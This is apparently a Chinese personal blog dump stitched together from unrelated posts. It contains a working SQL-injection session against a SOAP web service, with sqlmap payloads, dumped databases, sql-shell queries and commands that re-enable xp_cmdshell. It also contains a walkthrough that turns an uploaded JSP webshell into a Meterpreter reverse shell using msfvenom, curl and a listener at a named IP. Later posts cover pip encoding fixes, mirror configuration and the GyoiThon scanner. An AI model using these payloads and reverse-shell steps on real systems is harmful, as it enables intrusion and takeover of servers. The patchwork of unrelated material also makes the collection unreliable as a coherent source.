[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program
[*] starting at 11:03:20
[11:03:54] [INFO] testing Microsoft SQL Server
[11:03:54] [INFO] confirming Microsoft SQL Server
[11:04:24] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:04:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[11:04:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'
[*] shutting down at 11:04:24
注入payload单独发出来,如下:
---
Parameter: SOAP #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:getcode>
<urn:ins>1' AND 1597 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1597=1597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'DZUD'='DZUD</urn:ins>
</urn:getcode>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:getcode>
<urn:ins>1' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(117)+CHAR(78)+CHAR(90)+CHAR(84)+CHAR(69)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(102)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(73)+CHAR(83)+CHAR(102)+CHAR(106)+CHAR(101)+CHAR(70)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(68)+CHAR(86)+CHAR(76)+CHAR(84)+CHAR(73)+CHAR(122)+CHAR(99)+CHAR(66)+CHAR(82)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(75)+CHAR(98)+CHAR(102)+CHAR(107)+CHAR(99)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- aKgd</urn:ins>
</urn:getcode>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---
我们可以偷懒一下,直接payload拿过来看看反包有什么不一样的地方~看到差别了吗。
Type: 报错注入(error-based):
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 459
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request.--->在将 varchar 值 'qpbzq1qzkxq' 转换成数据类型</faultstring><detail/></soap:Fault></soap:Body></soap:Envelope>
=======================================================================================
=======================================================================================
Type: 联合查询(UNION query),输出的信息比较多,限于篇幅,放上一些数据:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 20111
<c_me_com>10005</c_me_com><c_me_no>14</c_me_no><c_me_bt>10.11.201.233</c_me_bt><c_me_command>0</c_me_command><c_me_lenght>2</c_me_lenght><c_me_start>2000</c_me_start><c_me_lastvalue>0</c_me_lastvalue><c_me_maxstep>50</c_me_maxstep><c_me_webcode>com7.db001.db001t</c_me_webcode><c_me_by19>0.00</c_me_by19><c_me_by20>1</c_me_by20><c_me_lastdate4>2018-08-08T05:00:24.677+08:00</c_me_lastdate4><c_me_lastvalue4>313</c_me_lastvalue4><c_me_lastdate3>2018-08-08T06:03:06.137+08:00</c_me_lastdate3><c_me_lastvalue3>313</c_me_lastvalue3><c_me_lastdate2>2018-08-08T07:05:47.173+08:00</c_me_lastdate2><c_me_lastvalue2>313</c_me_lastvalue2><c_me_lastdate1>2018-08-08T08:08:28.543+08:00</c_me_lastdate1><c_me_lastvalue1>313</c_me_lastvalue1><c_me_lastsuredate>2018-08-08T11:11:05.27+08:00</c_me_lastsuredate><c_me_lastsurevalue>313</c_me_lastsurevalue></d2></ds></diffgr:diffgram></getcodeResult></getcodeResponse></soap:Body></soap:Envelope>
当然在平常注入的过程中,不仅仅存在上述的注入,我们更多的是常见的盲注、联合查询或者是布尔盲注、时间盲注等等;我们这里举得例子同样存在,当然也是万能的awvs跑出来的:
Discovered by Blind SQL Injection
URL encoded POST input ins was set to eizSls
查看不同输入的符号对应的true、flase值,单数的%27输入进去我们可以看到是flase,双数输入进去则为true:
462' => ERROR
462'' => OK
GwHgee''' => ERROR
7Ahb38'''' => OK
CXBMlX''''' => ERROR
xgBDwt'''''' => OK
eizSls''''''' => ERROR
老方法,直接SQLMAP跑~
POST /WebService1.asmx/getcode HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://vuln_ip:8081/WebService1.asmx?WSDL
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 17
Host: vuln_ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
ins=eizSls
跑出来也是一样的效果,当然是一样的注入点,都是getcode这个功能接口跑的数据:
POST parameter 'ins' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: ins (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: ins=eizSls' AND 7541 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7541=7541) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'EJIL'='EJIL
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: ins=eizSls' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(85)+CHAR(78)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(72)+CHAR(81)+CHAR(82)+CHAR(108)+CHAR(89)+CHAR(68)+CHAR(67)+CHAR(99)+CHAR(105)+CHAR(109)+CHAR(105)+CHAR(86)+CHAR(121)+CHAR(99)+CHAR(122)+CHAR(90)+CHAR(109)+CHAR(112)+CHAR(98)+CHAR(88)+CHAR(89)+CHAR(68)+CHAR(90)+CHAR(101)+CHAR(71)+CHAR(100)+CHAR(118)+CHAR(81)+CHAR(114)+CHAR(83)+CHAR(101)+CHAR(90)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- HqcH
---
康康user,发现是dbo。SQL SERVER中[dbo]的解释:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:16:02] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> user
[11:16:13] [INFO] fetching SQL query output: 'user'
user: 'dbo'
看一下服务器是否站库分离:
sql-shell> select @@servername;
[11:17:21] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
select @@servername;: 'WIN-VO157IKGT24'
sql-shell> select host_name();
[11:17:25] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
select host_name();: 'WIN-VO157IKGT24'
两个都是WIN-VO157IKGT24所以应该没有站库分离。看一下数据库版本号
sql-shell> Select @@version
[11:17:34] [INFO] fetching SQL SELECT statement query output: 'Select @@version'
Select @@version: 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr 2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch --dbs
---
[11:04:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:34] [INFO] fetching database names
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ytems
[11:04:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'
[*] shutting down at 11:04:35
dbcc addextendedproc ("sp_oacreate","odsole70.dll");
dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
to be continued;
.\gradlew.bat task
Active code page: 65001
Failed to notify ProjectEvaluationListener.afterEvaluate(), but primary configuration failure takes precedence.
java.lang.RuntimeException: SDK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME environment variable.
at org.gradle.initialization.DefaultGradleLauncher.doBuildStages(DefaultGradleLauncher.java:122)
at org.gradle.initialization.DefaultGradleLauncher.access$200(DefaultGradleLauncher.java:32)
at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:99)
at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:93)
at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:90)
at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:62)
at org.gradle.initialization.DefaultGradleLauncher.doBuild(DefaultGradleLauncher.java:93)
at org.gradle.initialization.DefaultGradleLauncher.run(DefaultGradleLauncher.java:82)
at org.gradle.launcher.exec.InProcessBuildActionExecuter$DefaultBuildController.run(InProcessBuildActionExecuter.java:94)
at org.gradle.tooling.internal.provider.ExecuteBuildActionRunner.run(ExecuteBuildActionRunner.java:28)
at org.gradle.launcher.exec.ChainingBuildActionRunner.run(ChainingBuildActionRunner.java:35)
at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:43)
at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:28)
at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:78)
at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:48)
at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:51)
at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:28)
at org.gradle.launcher.cli.RunBuildAction.run(RunBuildAction.java:43)
at org.gradle.internal.Actions$RunnableActionAdapter.execute(Actions.java:170)
at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:237)
at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:210)
at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:35)
at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:24)
at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:206)
at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:169)
at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:33)
at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:22)
at org.gradle.launcher.Main.doAction(Main.java:33)
at org.gradle.launcher.bootstrap.EntryPoint.run(EntryPoint.java:45)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.gradle.launcher.bootstrap.ProcessBootstrap.runNoExit(ProcessBootstrap.java:54)
at org.gradle.launcher.bootstrap.ProcessBootstrap.run(ProcessBootstrap.java:35)
at org.gradle.launcher.GradleMain.main(GradleMain.java:23)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.gradle.wrapper.BootstrapMainStarter.start(BootstrapMainStarter.java:33)
at org.gradle.wrapper.WrapperExecutor.execute(WrapperExecutor.java:130)
at org.gradle.wrapper.GradleWrapperMain.main(GradleWrapperMain.java:48)
FAILURE: Build failed with an exception.
https://blog.csdn.net/coder_ken/article/details/50853927
一句话木马反弹shell
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd
/u01/oracle/user_projects/domains/base_domain
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=whoami
oracle
msfvenom先生成反弹shell文件,赋权。
root@iZj6cgn7odv59wmjjhe6zwZ:~## msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=47.52.233.92 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1046632 bytes
Final size of elf file: 1046632 bytes
root@iZj6cgn7odv59wmjjhe6zwZ:~## chmod 777 shell.elf
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=ls
测试一下一句话木马,是可以执行命令的:
total 1100
drwxr-x--- 15 oracle oracle 4096 Apr 27 08:06 .
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 ..
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 autodeploy
drwxr-x--- 6 oracle oracle 4096 Apr 25 00:23 bin
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 common
drwxr-x--- 9 oracle oracle 4096 Apr 25 00:24 config
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 console-ext
-rw-r----- 1 oracle oracle 234 Apr 25 00:23 derby.log
-rw-r----- 1 oracle oracle 257 Apr 25 00:24 edit.lok
-rw-r----- 1 oracle oracle 327 Jul 19 2017 fileRealm.properties
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 init-info
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 lib
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 nodemanager
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 orchestration
drwxr-x--- 2 oracle oracle 4096 Apr 26 01:39 original
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 security
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 servers
-rwxr-x--- 1 oracle oracle 261 Apr 25 00:23 startWebLogic.sh
drwxr-x--- 3 oracle oracle 4096 Apr 25 09:49 tmp
在一句话木马上执行下载命令,Wget和Curl都可以,一般linux机器上都自带下载工具
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=curl -o shell.elf http://ip/shell.elf
等待下载完毕;继续赋权
chmod 777 shell.elf
在查看一下:
total 1100
drwxr-x--- 15 oracle oracle 4096 Apr 27 08:06 .
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 ..
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 autodeploy
drwxr-x--- 6 oracle oracle 4096 Apr 25 00:23 bin
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 common
drwxr-x--- 9 oracle oracle 4096 Apr 25 00:24 config
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 console-ext
-rw-r----- 1 oracle oracle 234 Apr 25 00:23 derby.log
-rw-r----- 1 oracle oracle 257 Apr 25 00:24 edit.lok
-rw-r----- 1 oracle oracle 327 Jul 19 2017 fileRealm.properties
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 init-info
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 lib
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 nodemanager
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 orchestration
drwxr-x--- 2 oracle oracle 4096 Apr 26 01:39 original
drwxr-x--- 2 oracle oracle 4096 Apr 25 00:23 security
drwxr-x--- 3 oracle oracle 4096 Apr 25 00:23 servers
-rwxrwxrwx 1 oracle oracle 1046632 Apr 27 08:06 shell.elf
-rwxr-x--- 1 oracle oracle 261 Apr 25 00:23 startWebLogic.sh
drwxr-x--- 3 oracle oracle 4096 Apr 25 09:49 tmp
我们发现已经成功下载了反弹shell的msf文件,直接执行
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=./shell.elf,执行前别忘了在服务器上监听端口。
# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:1234
执行完就可以看到建立连接的流量接入了:
[*] Meterpreter session 1 opened (172.31.116.237:1234 -> 59.110.152.168:44832) at 2020-04-27 16:08:48 +0800
下一步:
meterpreter > shell
Process 460 created.
Channel 1 created.
whoami
oracle
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.2$ whoami
whoami
oracle
sh-4.2$ sudo su
sudo su
sh: sudo: command not found
python -c 'import pty;pty.spawn("/bin/bash")'
[oracle@5c6fe690ac22 base_domain]$ pwd
pwd
/u01/oracle/user_projects/domains/base_domain
[oracle@5c6fe690ac22 base_domain]$ ls
ls
autodeploy console-ext init-info original startWebLogic.sh
bin derby.log lib security tmp
common edit.lok nodemanager servers
config fileRealm.properties orchestration shell.elf
[oracle@5c6fe690ac22 base_domain]$ uname -a
uname -a
Linux 5c6fe690ac22 3.10.0-1062.12.1.el7.x86_64 ##1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
以上。
自从修改了windows终端的编码格式后,就出了各种问题,几乎在终端上执行的软件都运行不了,提示LookupError: unknown encoding: cp65001,如下报错。
C:\Users\本阿信>pip --version
Traceback (most recent call last):
File "c:\python27\lib\runpy.py", line 174, in _run_module_as_main
"__main__", fname, loader, pkg_name)
File "c:\python27\lib\runpy.py", line 72, in _run_code
exec code in run_globals
File "C:\Python27\Scripts\pip.exe\__main__.py", line 4, in <module>
File "c:\python27\lib\site-packages\pip\_internal\cli\main.py", line 10, in <module>
from pip._internal.cli.autocompletion import autocomplete
File "c:\python27\lib\site-packages\pip\_internal\cli\autocompletion.py", line 9, in <module>
from pip._internal.cli.main_parser import create_main_parser
File "c:\python27\lib\site-packages\pip\_internal\cli\main_parser.py", line 7, in <module>
from pip._internal.cli import cmdoptions
File "c:\python27\lib\site-packages\pip\_internal\cli\cmdoptions.py", line 31, in <module>
from pip._internal.utils.ui import BAR_TYPES
File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 64, in <module>
_BaseBar = _select_progress_class(IncrementalBar, Bar) # type: Any
File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 57, in _select_progress_class
six.text_type().join(characters).encode(encoding)
LookupError: unknown encoding: cp65001
只能怪自己,好好的改什么txt文本编码,现在好了。解铃还须系铃人:暂时在该终端下可以使用pip
C:\Users\本阿信>set PYTHONIOENCODING=UTF-8
C:\Users\本阿信>pip --version
pip 20.0.2 from c:\python27\lib\site-packages\pip (python 2.7)
链接还建议设置全局变量为$env:PYTHONIOENCODING = "UTF-8",但是我搜索了一下,没有找到方法,希望会的朋友邮件我教我。
CHCP 936
UTF-8是unicode编码的一种落地方案:
Unicode符号范围 | UTF-8编码方式 (十六进制) | (二进制) ——————–+——————————————— 0000 0000-0000 007F | 0xxxxxxx 0000 0080-0000 07FF | 110xxxxx 10xxxxxx 0000 0800-0000 FFFF | 1110xxxx 10xxxxxx 10xxxxxx 0001 0000-0010 FFFF | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
\x对应的是UTF-8编码的数据,通过转化规则可以转换为Unicode编码,就能得到对应的汉字,转换规则很简单,先将\x去掉,转换为数字,然后进行对应的位移操作即可,需要注意的是先要判断utf-8的位数.
联系我:chihou.pro@gmail.com ^_^谢谢
安装scikit-learn依赖包,安装时一直报错time out超时,所以加上了default-timeout参数:
pip3 --default-timeout=1000 install -U scikit-learn
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/73/db/7d8204ddba84ab5d1e4fd1af8f82bbe39c589488bee71e45c662f4144010/scikit_learn-0.22.1-cp37-cp37m-manylinux1_x86_64.whl (7.0MB)
100% |████████████████████████████████| 7.0MB 159kB/s
Successfully installed scikit-learn-0.22.1
pip3 --default-timeout=1000 install -U SciPy
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/dd/82/c1fe128f3526b128cfd185580ba40d01371c5d299fcf7f77968e22dfcc2e/scipy-1.4.1-cp37-cp37m-manylinux1_x86_64.whl (26.1MB)
100% |████████████████████████████████| 26.1MB 44kB/s
Successfully installed SciPy-1.4.1
或者还有一种可能是因为pip找的库在国外的库,会导致下载速度过慢。这种情况可以直接换成国内的源
vi ~/.pip/pip.conf
把下面内容放进去
[global]
timeout = 6000
index-url = https://pypi.tuna.tsinghua.edu.cn/simple/
*******
**pip国内的一些镜像:
*******
阿里云 http://mirrors.aliyun.com/pypi/simple/
中国科技大学 https://pypi.mirrors.ustc.edu.cn/simple/
豆瓣(douban) http://pypi.douban.com/simple/
清华大学 https://pypi.tuna.tsinghua.edu.cn/simple/
中国科学技术大学 http://pypi.mirrors.ustc.edu.cn/simple/
windows下:
进入C:\Users\用户名\pip,在pip目录下新建文件(没有新建文件夹)
pip.ini
同样输入上面的内容即可。
可以看到,下载依赖已经在我们指定的pip库里索引了。
# pip install pandas
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: pandas in /usr/local/lib/python2.7/dist-packages (0.24.2)
Requirement already satisfied: pytz>=2011k in /usr/lib/python2.7/dist-packages (from pandas) (2019.3)
Requirement already satisfied: numpy>=1.12.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (1.16.6)
Requirement already satisfied: python-dateutil>=2.5.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (2.8.1)
Requirement already satisfied: six>=1.5 in /usr/lib/python2.7/dist-packages (from python-dateutil>=2.5.0->pandas) (1.14.0)
title:GyoiThon Scanner
下载源文件后,进入文件夹路径,根据python的依赖进行安装,即requirements.txt文件:
PS G:\GyoiThon> pip install -r requirements.txt
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting beautifulsoup4>=4.6.3
Using cached https://files.pythonhosted.org/packages/c5/48/c88b0b390ae1f785942fc83413feb1268a1eb696f343d4d55db735b9bb39/beautifulsoup4-4.8.2-py2-none-any.whl
Requirement already satisfied: cchardet>=2.1.4 in c:\python27\lib\site-packages (from -r requirements.txt (line 2)) (2.1.5)
Collecting censys>=0.0.8
Using cached https://files.pythonhosted.org/packages/88/4b/3ca07679928c26bb5503b53c37e2f6eef2521289956e2c1bf74b64008afa/censys-0.0.8.tar.gz
Requirement already satisfied: docopt>=0.6.2 in c:\python27\lib\site-packages (from -r requirements.txt (line 4)) (0.6.2)
Collecting google-api-python-client>=1.7.4
Using cached https://files.pythonhosted.org/packages/31/c7/16ca16d28f2d71c8bd6fa67c91eb2a82259dc589c0504f903b675ecdaa84/google_api_python_client-1.7.11-py2-none-any.whl
Collecting Jinja2>=2.10.1
Using cached https://files.pythonhosted.org/packages/65/e0/eb35e762802015cab1ccee04e8a277b03f1d8e53da3ec3106882ec42558b/Jinja2-2.10.3-py2.py3-none-any.whl
ERROR: Could not find a version that satisfies the requirement matplotlib>=3.0.3 (from -r requirements.txt (line 7)) (from versions: 0.86, 0.86.1, 0.86.2, 0.91.0, 0.91.1, 1.0.1, 1.1.0, 1.1.1, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1rc1, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 2.0.0b1, 2.0.0b2, 2.0.0b3, 2.0.0b4, 2.0.0rc1, 2.0.0rc2, 2.0.0, 2.0.1, 2.0.2, 2.1.0rc1, 2.1.0, 2.1.1, 2.1.2, 2.2.0rc1, 2.2.0, 2.2.2, 2.2.3, 2.2.4)
ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7))
报错ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7))称没有找到匹配的版本,以为是pip的版本问题,所以进行pip版本升级。
python -m pip install --upgrade pip
DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Requirement already up-to-date: pip in c:\python27\lib\site-packages (19.3.1)
但是依然无效,系统提示pip为最新版本。思索着应该是python的版本问题。直接就上python3
使用pip3进行下载更新:
pip3 install -r requirements.txt -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com
##速度可以感受一下:
Looking in indexes: http://pypi.douban.com/simple/
Requirement already satisfied: beautifulsoup4>=4.6.3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (4.8.0)
Collecting cchardet>=2.1.4 (from -r requirements.txt (line 2))
Downloading http://pypi.doubanio.com/packages/c6/20/905b6c5664736d884a40ac3b1204ab874c3c4a8ce86f7b2e28abc1fc6ee4/cchardet-2.1.5-cp37-cp37m-manylinux1_x86_64.whl (241kB)
100% |████████████████████████████████| 245kB 6.9MB/s
Collecting censys>=0.0.8 (from -r requirements.txt (line 3))
-i $url --trust-host $host此参数则是指定pip下载更新的url库。
后来发现,requirements中,matplotlib>=3.0.3这一项依赖需要python3.6版本以上,所以运行会报错。
cat /media/root/binAxin/GyoiThon/requirements.txt
beautifulsoup4>=4.6.3
cchardet>=2.1.4
censys>=0.0.8
docopt>=0.6.2
google-api-python-client>=1.7.4
Jinja2>=2.10.1
matplotlib>=3.0.3
msgpack-python>=0.5.6
networkx>=2.2
pandas>=0.22.0
pysocks>=1.6.7
Scrapy>=1.5.0
tldextract>=2.2.1
urllib3>=1.25
运行gyoithon后,会在module文件夹对CVE漏洞进行更新配置,此时我们等待即可。看一下简介:
GyoiThon根据学习数据识别安装在Web服务器上的软件(操作系统,中间件,框架,CMS等)。之后,GyoiThon为已识别的软件执行有效的攻击。最终,GyoiThon会自动生成扫描结果报告。
上述处理均由GyoiThon自动执行;用户唯一的操作就是在GyoiThon中,输入目标web服务器的首页URL。这非常的简单,几乎不花费你任何的时间和精力,就能让你轻松的识别Web服务器上的漏洞。
所以GyoiThon需要一些识别项(特征库)进行匹配,下载完后,就可以使用扫描器了;需要注意的是,我们运行前需要对host文件进行配置
# ls
config.ini handout LICENSE __pycache__ requirements.txt util.py
docker host.txt logs README.md signatures util.pyc
gyoithon.py img modules report temp_signatures
# cat host.txt
http localhost 80 /
如上,格式为:
协议<空格>url地址<空格>端口号<空格>路径
PS G:\GyoiThon> python3 .\gyoithon.py
